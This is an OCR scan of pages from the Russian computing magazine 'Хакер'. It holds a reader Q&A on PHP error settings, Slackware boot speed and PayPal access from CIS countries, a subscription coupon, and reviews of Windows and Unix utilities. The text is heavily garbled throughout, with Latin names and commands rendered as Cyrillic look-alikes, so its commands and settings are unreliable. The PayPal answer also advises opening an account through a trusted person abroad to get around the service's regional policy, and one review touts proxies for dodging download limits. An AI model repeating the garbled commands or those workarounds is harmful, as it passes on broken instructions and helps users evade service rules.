файла (размещают относящиеся к нему блоки как можно ближе). 
Однако в современных файловых системах ІЛМІХподобной пробле- 
мы не существует в принципе. Фрагментация под ехІЗ и ВеізегРЗ 
редко составляет больше 5%. Соответственно, головке нет необ- 
ходимости прыгать по всем цилиндрам. Нет фрагментации — нет 
реальной необходимости и в дефрагментаторах. 



(^: Знаю, что, в зависимости от различных параметров, РНР по- 
разному выводит сообщения об ошибках. Можено подробнее? 



А: Существует несколько режимов оповещения об ошибках. Режим 
по умолчанию обозначается с помощью нескольких параметров в 
файле рітр.іпі: 

* Параметр бізрІау_еггогз (оп или оЩ указывает, следует ли отобра- 
жать сообщения об ошибках в браузере. 

* Параметр Іод_еггогз (оп или оТТ) инициирует запись об ошибках сооб- 
щения в файл журнала. Для тоб_рІтр по умолчанию этим файлом 
является еггоМод. 

* Параметр еггог_герог!іпд определяет, в каких случаях следует гене- 
рировать предупреждение, а в каких его можно проигнорировать. 
Все эти параметры могут быть обозначены не только через конфиг 
рИр.іпі, но и во время работы скрипта, с помощью функции іпі_зеІ(). 
Опытные гуру рекомендуют несколько режимов работы: 

1. Во время разработки сайта на тестовом сервере включать 
бізрІау_еггогз и отключать Іод_еггогз. 

2. Во время работы на реальном сервере, напротив, отключать 
бізрІау_еггогз, но включать Іод_еггогз. Это поможет тебе понять, что 
произошло, и исправить ошибку, но в тоже время не даст потенци- 
альному хакеру полезную информацию. 

Используя одни лишь сообщения об ошибках и предупрежде- 
ниях, можно значительно ускорить отладку скриптов. Но во мно- 
гих случаях и этого окажется недостаточно. По ходу выполнения 
скрипта необходимо периодически выводить так называемые от- 
ладочные сообщения — значения переменных, к примеру. Чтобы 
этот хлам не выводить на экран, отечественные разработчики со- 
здали специальную хакерскую консоль ( ИДр://бкІаЬ.ш/ІіЬ/РеЬиа 
НаскегСопзоІеЛ . Рекомендую! 

С>: Установил 81аск\ѵаге Ілпих и даже немного пригорюнился. 
Загружается целую вечность. Можно смело варить кофе — вер- 
нешься к окончанию загрузки. Это можно каким-нибудь образом 
пофиксить? Отключить там что-нибудь. . . 

А: Самое узкое место в загрузке системы — сервис гс.ітоіріид. Если 
это возможно, то его лучше отключить. Для этого надо снять атри- 
бут «исполняемый» для файпа/еіс/гс.сі/гс.ііофіид. Стоит заметить, 
что в некоторых случаях без этого сервиса не обойтись, поэтому от- 
ключить его не получится. Также уменьшить время загрузки можно 
путем нехитрых манипуляций с файлом /еіс/гс.сІ/гс.М. Нужно лишь 
закомментировать в нем строки: 

## ІІрбаІе аІІ Фе зііагесі ІіЬгагу Ііпкз: 

#і( [-х/зЬіп/ІсІсоп(ід ]; Феп 

* ескіо "СІрсІаІііпд зНагесІ ІіЬгагу Ііпкз: /зЬіп/ІбсопЯд" 

* /зЬіп/ІбсопЯд 

#Г\ 

При добавлении в систему новых библиотек придется вручную за- 
пускать ІсІсопТід, но оно того стоит. Время загрузки сокращается 
колоссально. 

(^): Возможно ли легально завести аккаунт в американской платеж- 
ной системе РауРаІ? 

А: Я понимаю твою заинтересованность в этой платежной системе 
(как-никак самая крупная в Штатах), но завести в ней аккаунт будет 
чрезвычайно сложно. РауРаІ ( ѵѵѵѵѵѵ. раѵраі. сот ) категорически не 
приемлет работу со странами СНГ — такова их политика. Поэтому 
полностью легальную «палку» можно приобрести двумя способа- 
ми. Первый вариант: оформить аккаунт в платежной системе че- 
рез человека из разрешенных стран. Для этого, само собой, нужна 
договоренность с человеком, а поскольку аккаунт привязывается 
к банковскому счету или кредитной карте, то должно быть и огром- 
ное доверие. Это могут быть близкие родственники или друзья. 
Второй вариант, менее реальный: открыть компанию в стране, с 
которой работает «палка», и зарегистрировать бизнес-аккаунт в 
РауРаІ на эту компанию. Сможешь спокойно работать и при этом 
не прятать свой ІР-адрес. Правда, стоить это будет недешево, в том 
числе и со стороны самой платежной системы, т 
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«Хакер» +0Ѵ0 


«Хакер» + «Хакерга» 


990р ЗА 6 МЕСЯЦЕВ 


1 830р ЗА 6 МЕСЯЦЕВ 


1 920р ЗА 12 МЕСЯЦЕВ 


ЗбООр ЗА 12 МЕСЯЦЕВ 




«Хакер» +Р\Ю 



РЕДА 


КЦИОННАЯ 


ПОДГ 


1ИСКА 



1 Заполнить купон и квитанцию 

2 Перечислить стоимость подписки через Сбербанк 

3 Обязательно прислать в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 

по электронной почте: зиЬзсгіЬе@дІс.ги; 
по факсу: 8-495-780-88-24; 

по адресу: 119021, Москва, ул. Тимура Фрунзе, д.11, стр. 44-45 



990р ЗА 6 МЕСЯЦЕВ 
1920р ЗА 12 МЕСЯЦЕВ 

«Хакер» + «Хакерга» 

1 830р ЗА 6 МЕСЯЦЕВ 
ЗбООр ЗА 12 МЕСЯЦЕВ 



ВНИМАНИЕ! 

подписка оформляется в день обработки купона и квитанции. 

Купоны, отправленные по факсу или электронной почте, обрабатываются 
в течение 5 рабочих дней. Купоны, отправленные почтой 
на адрес редакции обрабатываются в течение 20 дней. 

Рекомендуем использовать электронную почту или факс. 



Подписка производится с номера, выходящего через один календарный месяц 
после оплаты. Например, если произвести оплату в сентябре, то подписку 
можено оформить с ноября. 

По всем вопросам, связанным с подпиской, звони по бесплатным телефонам: 
780-88-29 (для москвичей) и 8-800-200-3-999 (для регионов и абонентов 
Билайн, МТС и МегаФон). 

Вопросы по подписке можно задавать по е-плаіі: іггіо@дІс.ги 



Подписка 

для юридических лиц 

Москва: ООО «Интер-Почта», 
тел.: 500-00-60, ѵѵѵѵѵѵ.іпіегросНіа.ги 

Для получения счета на оплату подпис- 
ки нужно прислать заявку с названием 
журнала, периодом подписки, банковс- 
кими реквизитами, юридическим и поч- 
товым адресом, телефоном и фамилией 
ответственного лица за подписку. 



■ 

А- 



ПОДПИСНОЙ КУПОН 

Прошу оформить подписку: 



I I на журнал Хакер + ОѴй 

на комплект Хакер+ ОѴР и Хакер Спец + СО 



на □ 



месяцев 



начиная с 



200 г 



|—| Доставлять журнал по почте 
1 на домашний адрес 
|—| Доставлять журнал курьером на 
* адрес офиса (по г. Москве) 



Подробнее о курьерской доставке читайте ниже 



(отметьте квадрат выбранного варианта подписки) 



Ф.И.О. 



пп. пп. пп. 

день месяц год 

АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( } 

код 

е-таіі 

сумма оплаты 

* Курьерская доставка осуществляется только по Москве 
на адрес офиса. Для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата за « 


» 


Сумма 


с 


200_ г. 





месяц 



Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИК 044525545 




КПП -772901001 


Плательщик 
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МИХАИЛ МИХИН / СЕМТМЕП@КЕАЬ.ХАКЕР.КЦ / 
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ІІпІоскег 1.8.1 от 03.03.2006 



* 



ѴѴіпсІоѵѵз 98, Ме, КІТ, 2000, ХР 

Бесплатно 

183 Кб 

ИПр://ссоІІотЬ.Ігее.Іг/ипІоскег/ 



чц, ^Мр1Г| ППр 





Случалось ли, что нашалюбимая ОС ѴѴіпсІоѵѵз не даетудалить файл 
или папку, хотя видимых причин для этого нет? Полагаю, что слу- 
чалось, и не раз. Например, ты впопыхах освобождаешь место на 
винте от скопившихся фильмов для того, чтобы записать свежач- 
ка, и после благополучного прожига болванки нажимаешь завет- 
ную комбинацию ЗИіЙ + ОеІ. Ассезз Оепіеб. Впрочем, видеофайлы 

— это отдельная песня, и невозможность их удаления связана с 
попытками системы считать информацию о них. В таких случаях 
достаточно просто подождать некоторое время (если файл битый 

— ждать будешь до второго пришествия). Тут есть один хинт, о 
котором я тебе с радостью поведаю. Берем и удаляем ключ реес- 
тра @=«{87062094-71 ВЗ-4Ь9а-9489-5РЕ685СЮС73Е}», находящ- 
ийся по следующему адресу: «НКЕУ_СЕА55ЕЗ_ВООТ\5узІетРіІе 
АззосіаІіопз\.аѵі\зИеІІех\Ргорег1:уНапбІег». При этом мы потеряем 
только информацию о некоторых свойствах файла. Описанный 
метод — не панацея от всех бед, и порой Ехріогег.ехе (тот самый 
стандартный виндовый шелл) не позволит удалить что-либо. На по- 
мощь приходит крохотная утилита Шоскег, которая встраивается 
в контекстное меню и позволяет удалять/перемещать/переимено- 
вывать любые файлы и папки в системе. Блокирующий нужные нам 
действия процесс не завершается, что в случае того же Ехріогег’а 
очень удобно. С некоторыми файлами дела обстоят хуже, и без 
ІІпІоскег’а приходится не только перезагружаться, но иногда даже 
использовать Весоѵегу Сопзоіе. На офсайте автор предлагает 
нашему вниманию сравнительную таблицу возможностей анало- 
гичных продуктов, которая вполне правдива, так как полноценной 
замены (а она нужна при бесплатности?) у данной программы нет. 



ВеСеІ Оеіихе (ЫЕѴѴ) 4.2.264 от 21 .03.2006 

ѴѴіпсІоѵѵз 95/98/ІМТ 4/М Е/2000/ХР/2003/Ѵіз1:а 
350 рублей (30-дневная пробная версия) 

2 Мб 

ИДр://беІихе.геде1.сот/ги/боѵѵпІоаб.И!т#геІеазе 

Отечественные разработчики выпустили новую версию широко 
известного менеджера закачек. Не хотелось бы начинать с агита- 
ции — просто ознакомься с трансляцией наиболее важных момен- 
тов, касающихся программы, и сделай свой выбор. Вебе! Оеіихе 



■ - р 




загружает (с возможностью докачки после обрыва) файлы как с 
файловых (РТР), так и с веб-серверов (НТТР), и будет предпри- 
нимать неограниченное количество попыток, пока одна из них не 
увенчается успехом. Понятно, что программа докачивает файлы 
после обрыва связи с того места, где докачка была прервана, опять 
же с НТТР- и РТР-серверов. 

Принцип работы Ребе! Оеіихе такой: программа разбивает файл 
на части и загружает эти части одновременно, что позволяет уве- 
личить скорость загрузки от 300% до 500% (по заявлениям разра- 
ботчиков). ВеСеІ автоматически ищет дополнительные серверы 
для загрузки файлов (зеркала) и выбирает оптимальные источ- 
ники. Причем закачка может вообще осуществляться с разных 
серверов, что существенно увеличивает скорость скачивания. 
Для отстающих в борьбе за интернет-скорость ВеСе! Оеіихе имеет 
встроенную интеграцию с біаі-ир’ом. Ребе! Оеіихе сам дозвонится 
до провайдера, загрузит файлы и отсоединится, когда завершит 
загрузку. Если скачивание замедляется, то РеОеі Оеіихе отсоеди- 
нится от сервера и соединится с ним снова, давая вашей загрузке 
стартовый толчок. Программа ведет подробный лог каждой загруз- 
ки и каждого действия программы вне зависимости от того, были 
ли они успешными или нет. А при помощи встроенного многофунк- 
ционального планировщика можно запланировать такие события, 
как старт и пауза загрузки, запуск и закрытие программы, дозвон 
до провайдера и отсоединение. 

Встроенный РТР-браузер отображает структуру удаленного РТР- 
сервера в удобном для чтения формате, позволяя пользователю 
выбрать, какие файлы или директории он хочет загрузить. Подоб- 
но семейству МісгозоЙ ѴѴіпсІоѵѵз, РеѲеІ: Оеіихе теперь поставляется 
с несколькими графическими схемами интерфейса, позволяющи- 
ми изменить его внешний вид по вкусу. Поскольку в новой техно- 
логии не используются «скины», она не оказывает значительного 
влияния на размер и быстродействие программы. Сайт вменяемый 
и удобный. 
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ЗтагіѴѴИоіз (ІЧЕѴѴ) 4.1 (ВиіІс1 193) от 23.03.2006 



ГІ I 1 



ѴѴіпсІоѵѵз 98, Мѳ, ІЧТ, 2000, ХР, 2003 Зѳгѵег, ХР 64-ЫІ 
400 рублей (30-дневная пробная версия) 

2,94 Мб 

ИМр ://\ллллл/ . Іат оз . г и/ 
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Эта замечательная программа позволит быстро установить, что 
за аноним оставил неблагодарный комментарий в твоем ЖЖ, кто 
зарегистрировал домен быстрее тебя, и что это за ІР, на который 
утекла половина твоего трафика. Нет, это не доступ к базе всех 
провайдеров, а всего лишь утилита для запроса информации 
через ѵѵИоіз-сервер. Вбиваем ІР, имя хоста или домен, выбираем 
тип запроса и получаем необходимую информацию. В Интернете 
существует довольно много бесплатных сервисов, предоставляю- 
щих подобные услуги, но иметь такую программу под рукой намно- 
го удобнее. Программа представляет собой своеобразный «аІІ-іп- 
опе», который ведет логи всех обращений и позволяет оставлять 
свои комментарии к ним. В качестве примера можно вбить ІР-ад- 
рес какого-нибудь прокси-сервера и увидеть, где он находится, 
а также оценить скорость его работы, исходя из времени ответа. 
Конечно, те, кто перелопачивает целые списки прокси, предпоч- 
тут АссеззЭіѵег ( ѵѵѵѵѵѵ.ассеззсііѵег.сот ). а простому юзеру такая 
избыточность ни к чему. Для особо интересующихся скажу, что 
данная прога тоже может работать со списками ІР/хостов/доме- 
нов и даже может создавать архивы своего внутреннего формата. 
Из дополнительных возможностей следует отметить изначальную 
русификацию и возможность установки расширений для брау- 
зеров Іпіегпеі Ехріогег и МогіІІа РігеТох. В общем, удобно и ничего 
лишнего. О триальности хотелось бы сказать следующее: ника- 
ких назойливых экранов нет, а лицензия для студентов стоит еще 
дешевле. 



ІІпіѵегзаІ ЗИаге Эоѵѵпіоасіег 1 .3.3.4 от 27.01 .2006 

ѴѴіпсІоѵѵз 98, Ме, ІЧТ, 2000, ХР 
Бесплатно 
320 Кб — 1,4 Мб 
ИДр://бітопіиз.ги/сІизсІ.рІір 

Менеджеров закачек развелось очень много. Одно время даже 
был целый бум, когда каждый производитель хвалил именно свой 
продукт, и выбор было сделать сложно. Но на сегодняшний день 
уже определились победители и аутсайдеры, все возможности 
реализованы, интеграция в браузеры для удобства имеется, а 
бесплатных вариантов пруд пруди. Однако нам еще есть, что обсу- 
дить. Неважно, какая качалка стоит у тебя, менять мы ее не будем, 
а возможности расширить не мешало бы. Итак, если у тебя нетхос- 
тинга, а передать внушительный файл необходимо, то с большой 
вероятностью^ зальешь его через один из веб-сервисов, предна- 
значенных специально для этого. В России наибольшую популяр- 
ность получили ВарібЗИаге, МедаІІрІоасІ, ЗШ.Ри, ѴѴеЬРіІе, УоиЗепбІІ 
и МуТетрЭіг. На самом деле их намного больше, и описание всех 
потянет не на одну страницу. Слить и залить через собственный 



интерфейс предлагает каждый сервис, а некоторые, помимо это- 
го, лимитируют объем скачанных файлов. Можно заплатить п-ую 
сумму для снятия подобных ограничений, но этот вариант не для 
читателей X :). Смело сливаем ІІпіѵегзаІ ЗИаге Эоѵѵпіоасіег и необхо- 
димые для него плагины (каждый плагин отвечаетзаопределенный 
сервис), скармливаем ему ІІВІ_’ы — и можно свернуть все это дело 
втрей. Программаподдерживаетсписки прокси, что позволиттебе 
избавиться от ограничений на объем, а некоторые плагины име- 
ют специальные версии, работающие сразу через анонимайзер. 
Автор регулярно выкладывает обновленные версии плагинов в 
случае смены механизмов скачивания, о чем сообщает на своей 
персональной страничке. 



АН Му Моѵіез 3.9 (ВиіІс1 1 207) от 08.04.2006 

ѴѴіпсІоѵѵз 98, Ме, ІЧТ, 2000, ХР 

300 рублей (30-дневная пробная версия) 

2,9 Мб 

ИДр://ѵѵѵѵѵѵ.ЬоІібезоІТсот/гиз/аІІтутоѵіез.ИітІ 




Найти лучший каталогизатор для собственной коллекции фильмов 
сложно. Я перепробовал большое количество различных вариан- 
тов и остановился на АН Му Моѵіез. Ключевое слово — сбалансиро- 
ванность, так какхочется иметь множество различных функций, но 
не хочется громоздкости и неповоротливости программы. Здесь, 
чуть меньше чем в 3 мегабайта, все уложилось. Удобный интер- 
фейс: слева — список фильмов, справа — детальное описание 
выбранного. Добавление нового фильма происходит без рутин- 
ного вбивания информации: параметры видеофайла считаются и 
будут внесены в карточку автоматически, информация о фильме 
загрузится с ІМРсІ.сот (есть несколько сайтов на выбор, включая 
русскоязычные варианты), а большая РѴР-обложка — с Атагоп. 
сот . К фильму можно добавить скриншоты, сделав их прямо из 
программы. Возможности импорта/экспорта впечатляют, так что 
можно даже перенести базу на КПК, сюда же следует отнести 
функцию создания автономной копии БД с целью отправки свое- 
му другу, чтобы не пришлось ломать голову при ответе на вопрос: 
«Слышь, а че утя нового появилось?» Модули статистики и поиска 
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позволяют сортировать фильмы как вздумается — можно без труда 
выбрать фильмы с определенным актером, режиссером, жанром 
и т.д. Автор программы — наш соотечественник, и с ним можно по- 
общаться на официальном форуме, там же можно оставить свои 
пожелания по развитию сайта. Если хватит энтузиазма, можешь 
даже написать свой плагин (пока их сравнительно мало). АРІ для 
такого случая имеется. 



КІікЗНагрепег Рго 2.0 

ѴѴіпбоѵѵз 98/МЕ/КІТ/2000/ХР, МасіпІозИ 08 1 0.2.4 и выше 
$329,95 (демо-версия) 

8 Мб 

ІіНр://\л/\л/\л/.пікзоЙ\л/аге.сот/зІіор/сопУпбех.рІір?ІрІ=ргобикІѵѵаЫ&а 

ПікеІ=002334 




ІЧік ЗИагрепег Рго — это не программа, а мечта любого послушно- 
го мальчугана, представляющего, что такое цифровая фотогра- 
фия, и бьющегося днями и ночами над выбором: перешарп или 
переблюр? Вот как раз для таких бойких естествоиспытателей и 
предназначена программа, увеличивающая контурную резкость 
изображений. 

При работе этот замечательный графический плагин, стоимос- 
тью чуть выше 300 долларов, учитывает разрешение изображе- 
ния, расстояние, тип бумаги и качество печати и делает все воз- 
можное, чтобы на экране монитора или на бумаге изображение 
выглядело достаточно ярко. Еще бы он этого не делал, за та- 
кие-то денежки! Помимо этого, І\1ік ЗНагрепег Рго примечателен 
следующим: он заправски анализирует визуальные характерис- 
тики различных процессов печати, таких, например, как субли- 
мация, цифровая фотография и струйная печать, включая, что 
немаловажно, понимание различий между продукцией многочис- 
ленных производителей струйных принтеров. І\1ік ЗНагрепег Рго 
позволяет увеличивать резкость 16-битных изображений, име- 
ет встроенную функцию предварительного просмотра области 
изображения, набор инструментов, с помощью которых поль- 
зователи могут регулировать уровень резкости в любой части 
изображения. 

В комплект программы входит ВАѴѴ РгезИагрепіпд-фильтр для 
увеличения детальности в изображениях, конвертированных из 
ВАѴѴ-формата. 

І\Іік ЗИагрепег Рго совместим с большинством версий АбоЬе 
РЬоІозИор под ѴѴіпбоѵѵз и МасіпІозН 03 и дружит со следующими 
редакторами изображений: 

АбоЬе РИоІозИор от 5.5 до С32, АбоЬе РНоІозИор Еіетепіз от 1 до 
3.0, АбоЬе РНоЩЮеІихе, АбоЬе РИоЮзИор І_Е, СогеІ РаіпіЗИор Рго, 
СогеІ РИоІораіпІ, МісгозоЙ ОідііаІ Ітаде Рго, ШеасІ РИоІоІтрасЕ 
Да, совсем упущенный из виду момент: просятзатакую штуковину 
существенных денег, но, поверь, программа того стоит. 





ПЕТР СЕМИЛЕТОВ 

/ ѴѴШѴѴ.КОХТСЖ.КІЕѴ.ІІА / 



ІІІМІХѴѴАПЕ2 



Ссіск 

РОЗІХ(*ВЗО, Гіпих, Зоіагіз...) 
Размер (исходник в іаг.д т)\ 223 Кб. 
шІр://зѵѵаі.пеѴипіх/іпбех.ІіІтІ#сбск| 
Лицензия: <ЗШ <ЗРІ_ 




Консольная утилита, написанная Алексеем Семеновым, предна- 
значена для проверки СО и 0\Ю на читабельность. На мой взгляд, 
удобнее использовать обок, чем копировать содержимое диска 
в /сІеѵ/пиІ\ и наблюдать за ходом процесса. Сбск посекторно счи- 
тывает диск и выводит количество хороших и плохих секторов, а 
также максимальную, среднюю и минимальную скорость считыва- 
ния. Сбск может также (с параметром «-о <имя файла>») выводить 
результаты в файл, на основе которого утилита дпиріоі построит 
график. 

Для сборки обок из исходника не нужно никаких экзотических 
библиотек — все необходимое идет в дистрибутиве программы. 
Сбск можно использовать также для получения информации о 
СО или 0\Ю. Для этого надо запустить сбск с параметром «-і», 
и появится информация о том, является ли диск мультисессион- 
ным, какая на нем файловая система и так далее. В хозяйстве 
пригодится. 



ЕтеІРМ2 

Р05ІХ(*В30, 1_іпих, Зоіагіз...) 

Размер (исходник в Іаг.д і): 773 Кб. 

ІіІІр://етеІІт2.пеѴ 
Лицензия: <ЗШ <ЗРІ_ 

Классический двухпанельный файловый менеджер. Для его сбор- 
ки нужна, по сути, только библиотека ОТК версии 2.4 или выше. 
Собирается из исходника одной командой «таке» — скрипт кон- 
фигурации запускать не нужно. Его просто нет. 

Поведением етеІРМ2 схож с Кшзабег и ТоіаІ Соттапбег, вот 
только для функции выделения файлов нет привычных клавиш 
« + » и «Іпзеб». Зато есть много чего другого. Можно монтировать/ 
размонтировать разделы из контекстного меню (главное меню у 
программы отсутствует). Контекстное меню действительно за- 
висит от того, на каком файле ты нажал правую кнопку мыши. В 




верхней части этого контекстного меню будет предложен список 
программ, с помощью которых можно открыть текущий файл. 
Щелкнул на бРЕС'е — файловый менеджер предлагает тебе 
(ЗОѵіеѵѵ, СІМР, Іпкзсаре, дѵ. Если привязки типов файлов к про- 
граммам кажутся тебе неудобными, то в том же меню, в самом 
низу, находится пункт «ЕбіНіІе Іуре». Выбираешь его и назнача- 
ешь нужную тебе программу для запуска файлов этого типа. 

В контекстном меню также доступны плагины. Среди ниххочу отме- 
тить массовое переименование файлов, выделение по регулярным 
выражениям, запуск выбранной команды для каждого выделенно- 
го файла, вычисление дискового пространства, занимаемого вы- 
деленными элементами, упаковка файлов в архивы и распаковка 
архивов, поиск файлов. 

Наконец, в контекстном меню ты найдешь управление закладками 
и запуск дополнительных функций, например разбивку файла на 
части и сборку этих частей в единое целое. 

В етеІРМ2 встроен простенький текстовый редактор, однако, с 
автоматическим определением кодировок, взятым из редактора 
І_еаІраб. Кодировки ІІТР-8, ѴѴіпбоѵѵз 1251 и КОІ8-Р распознает вер- 
но — проверено. 

Внизу етеІРМ2 расположен некий аналог консоли в одну строку, 
и поле вывода результатов команд, запущенных таким образом. А 
между панелями находятся кнопки вызова наиболее востребован- 
ных функций: копирование, перемещение, переход на СО-ВОМ и 
в домашний каталог. 

ЕтеІРМ2 может принимать в командной строке некоторые инте- 
ресные параметры. РІапример, можно задать кодировку файловой 
системы (ключ «-епсобіпд»). Можно задать каталог для мусор- 
ной корзины: «-ІгазН=такая-то директория». Можно установить 
каталоги по умолчанию для первой и второй панелей параметра- 
ми «--опе=каталог» и «-Іѵѵо= каталог». 

ЕтеІРМ2 производит очень приятное впечатление и, что важно, 
активно развивается на протяжении уже нескольких лет. То есть, 
несмотря на компактность, этот проект, рассчитанный на перспек- 
тиву, а не однодневка. 
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Іпкзсаре 

Р08ІХ (*ВЗЭ, Ыпих, Зоіагіз...) 
Размер (исходник в 1аг.І022): 6,2 Мб. 
Іійр ://\ллллл/ . і п кзсар е . о гд/ 

Лицензия: (ЗІЧІІ (ЗРІ_ 




Есть графика растровая, изображение которой состоит из точек. 
А есть векторная графика. В ней картинка составляется из объек- 
тов: линий, геометрических фигур и так далее. Если в области рас- 
тровой графики признанный король — это ѲІМР, то для векторной 
графики под *піх-программой такого калибра смело можем считать 
Іпкзсаре. Сейчас, правда, появилась Ыпих-версия известного в 
ѴѴіпбоѵѵз (среди дизайнеров) векторного редактора Хага, однако 
его Ыпих-порт еще слишком сырой, чтобы можно было сравнивать 
его со зрелым продуктом, которым является Іпкзсаре. Хотя именно 
с Хага сравнение будет уместно, потому что Іпкзсаре и Хага — про- 
дукты одного калибра, то есть меньше, чем, скажем, СогеІ Эгаѵѵ! и 
АбоЬе Шизігаіог. 

Начинался Іпкзсаре как форк от другого векторного редакто- 
ра — Зосііросіі ( ѵѵѵѵѵѵ.зобіробі.сот ). Сделали форк четверо бывших 
разработчиков Зосііросіі. Зосііросіі развивается и поныне, однако не 
такими темпами, как Іпкзсаре, который все более и более отдаляет- 
ся от своего предка. В Зосііросіі внимание разработчиков сосредо- 
точено на создании простого редактора векторной графики, эко- 
номного в плане потребления ресурсов, а Іпкзсаре — это редактор, 
который старается оперировать со стандартным ЗѴО. 

В качестве основного графического формата Іпкзсаре использу- 
ет открытый формат ЗѴО, поддержка которого практикуется все 
шире и шире, причем ЗѴО — формат достаточно универсальный, 
он пригоден и для использования на веб-страницах, и для нужд ди- 
зайнеров, которые делают сложные графические проекты. Боль- 
шое внимание ЗѴѲ уделяет и АбоЬе, так что есть вероятность, что 
ЗѴО станет всеобщим форматом векторной графики, таким же 
привычным, как РОЕ для электронных публикаций. 

Кроме мощных средств редактирования векторных объектов, 
Іпкзсаре может импортировать растровую графику и даже конвер- 
тировать ее в векторные объекты! Поддерживается также вывод 
нарисованного в Іпкзсаре рисунка в растровый формат, а также в 
РОБ, ЕРЗ, РЗ, Роѵег Рау и АбоЬе Шизігаіог. 

Іпкзсаре полностью русифицирован — исключение составляют 
лишь некоторые из иллюстрированных учебников, прилагаемых к 
продукту, и доступных из меню «Справка > Учебники». Примеча- 
тельно, что учебники сделаны в самом Іпкзсаре, в формате ЗѴС. И 
отображаются, понятное дело, тоже в Іпкзсаре. 

Для отображения графики Іпкзсаре использует свой движок, кото- 
рый называется Ііѵагоі. Со временем, как обещают разработчики, 
в качестве движка будет использоваться Саіго. В будущем также 
планируется поддержка таких аспектов ЗѴО, как фильтры, анима- 
ция и ЗѴО-шрифты (последнее не означает, что в Іпкзсаре нельзя 
работать со шрифтами и текстом). 

Іпкзсаре поддерживает дополнительные устройства ввода, вроде 
планшетов, хотя можно рисовать в нем и мышью. А для любителей 
всего низкоуровневого в Іпкзсаре присутствует Редактор ХМ1_, в 
котором ты можешь редактировать свой рисунок напрямую через 
структуру ХМ1_. Ведь формат ЗѴС — это разновидность много- 



ликого ХМІ_. Кроме того, для Іпкзсаре можно писать скрипты на 
РуіИоп и РегІ. 

Единственное, чего не хватает в Іпкзсаре, так это предустанов- 
ленных текстур (однако функция заливки текстурой есть) и гради- 
ентов. Я понимаю, текстуры много весят, но пресеты градиентов 
составляют максимум несколько килобайт. Насколько я помню, в 
Зосііросіі такие пресеты были. И в исходнике есть директории, куда, 
по идее, надо помещать всякие текстуры и пресеты градиентов. Но 
каталоги эти пусты — кроме таке-файлов и ВЕАЭМЕ, в них ничего 
нет. Это я говорю не в упрек Іпкзсаре, а из соображений ощущения 
целостности продукта. В комплект входят учебники , а градиенты и 
текстуры — нет. Непорядок. 

Примеры изображений, созданных в Іпкзсаре, ты можешь пос- 
мотреть на ИДр://ѵѵікі.іпкзсаре.ога/ѵѵікі/іпбех.рИр/ОаІІегіез . Может, 
они и тебя вдохновят нарисовать что-нибудь в этой замечательной 
программе? 



КсИтѴіеѵѵег 

РОЗІХ(*ВЗЭ, Ыпих, Зоіагіз...) 
Размер (исходник в Іаг.дг): 765 Кб. 
НПр ://ѵ\ллллл ксіітѵіеѵѵег. пеі/ 
Лицензия: (ЗШ (ЗР1_ 




Программа для просмотра СНМ-файлов (сжатые НТМІ_, один из фор- 
матов файлов справки в ѴѴіпбоѵѵз). Лично мнетакая утилита понадоби- 
лась после того, как я скачал с сайта «Королевство ЭеІрНі» сборник 
статей весом в 10 мегабайт. В этом самом формате СНМ. В одном из 
прошлых выпусков ІІпіхѴѴагег я писал об утилите (ЗпоСНМ, которая 
позволяет смотреть СНМ-файл в Ыпих. Так вот, на здоровенном сбор- 
нике статей (ЗпоСНМ просто вылетала. Ведь не переключаться же мне 
под ѴѴіпбоѵѵз, когда захочется большой СНМ-файл почитать? Было 
найдено решение. 

КсИтѴіеѵѵег, как следует из названия, заточен под КЭЕ. Но можно и 
без КЭЕ, можно только с О!. Скрипту сопіідиге надо передать ключик 
«-ѵѵШі-ксІе», благодаря этому станет доступен КІО-зІаѵе, который 
больше интегрирует программу в КЭЕ. Но можно пользоваться и без 
интеграции. 

Что понравилось? Да, показывает большие файлы — это факт. Быст- 
рый запуск программы и качественный рендеринг страниц (с картин- 
ками). Есть закладки и система поиска, колоссальные возможности 
выбора языка и кодировки. Достаточно много настроек, хотя нельзя 
выбрать другой шрифт. Можно только увеличивать или уменьшать 
размер шрифта по умолчанию. 

Думаешь, это смутит отечественного пользователя? Да, незнание ан- 
глийского для ИТ-специалиста — это должно смущать. А его, в свою 
очередь, может смутить английский интерфейс. Русского перевода 
нет, но русские СНМ'ы читать можно — и это главное. 

Напоследок замечу, что сборка продукта нормально проходит при 
наличии одной только библиотеки 01, то есть никаких библиотек для 
чтения СНМ устанавливать не нужно. В дистрибутив КсНтѴіеѵѵег 
включена библиотека СНМЫВ, которая компилируется автоматичес- 
ки вместе с КсНтѴіеѵѵег. 
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СИМОНОВ ИЛЬЯ АКА ЗНТІІВМОѴІК 

/ ЗНТІІПМОѴІК@ПЕАІ_. ХАКЕР. РШ / 



Х-ТООІ-8 



ТгасѳРІиз32 



АсІіѵѳ@ Рііе Песоѵегу 5.3 



ѴѴіп 9х/І\ІТ/2к/ХР 
ЗНагеѴѴаге 
ЗІ 2 ѳ: 2,3 Мб 
ѵѵѵѵѵѵ.ззііпс.сот 



ѴѴіп 9х/І\ІТ/2к/ХР 
ЗИагеѴѴагѳ 
Зі2ѳ:580 Кб 
ѵѵѵѵѵѵ.іііе-гесоѵегу.пеі 
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Вот уж действительно хакерская тулза! Как говорит производи- 
тель, программа отображает взаимодействие между \д/іп32 при- 
ложением и 32 Ьіі ѴѴіпзоск АРІ без какой-либо модификации про- 
граммы. То есть это не просто высокоуровневый снифер, но еще 
и значительный инструмент отладки сетевых приложений. Кстати, 
если ты прочитал статью про исследование сетевого червя, то 
продолжать свои исследования относительно сетевой активности 
можешь уже с помощью этой программы. Утилита поддерживает 
\А/іпзоск2АРІ и РАЗ. Кроме этого, программа содержиттехнологию 
отладки, которая поддерживает АсІіѵеХ и ОІ_Е. ТгасеРІиз показыва- 
етсокетные функции, которые вызывает запущенное приложение, 
а также отображает детальную информацию о каждом действии 
программы в сети, включая сообщения об ошибках. Помимо этого, 
утилита содержит обширный набор настроек, таких как многочис- 
ленные фильтры. С установкой проблем не возникает. Сразу же 
после запуска программа спрашивает, за кем ей необходимо вес- 
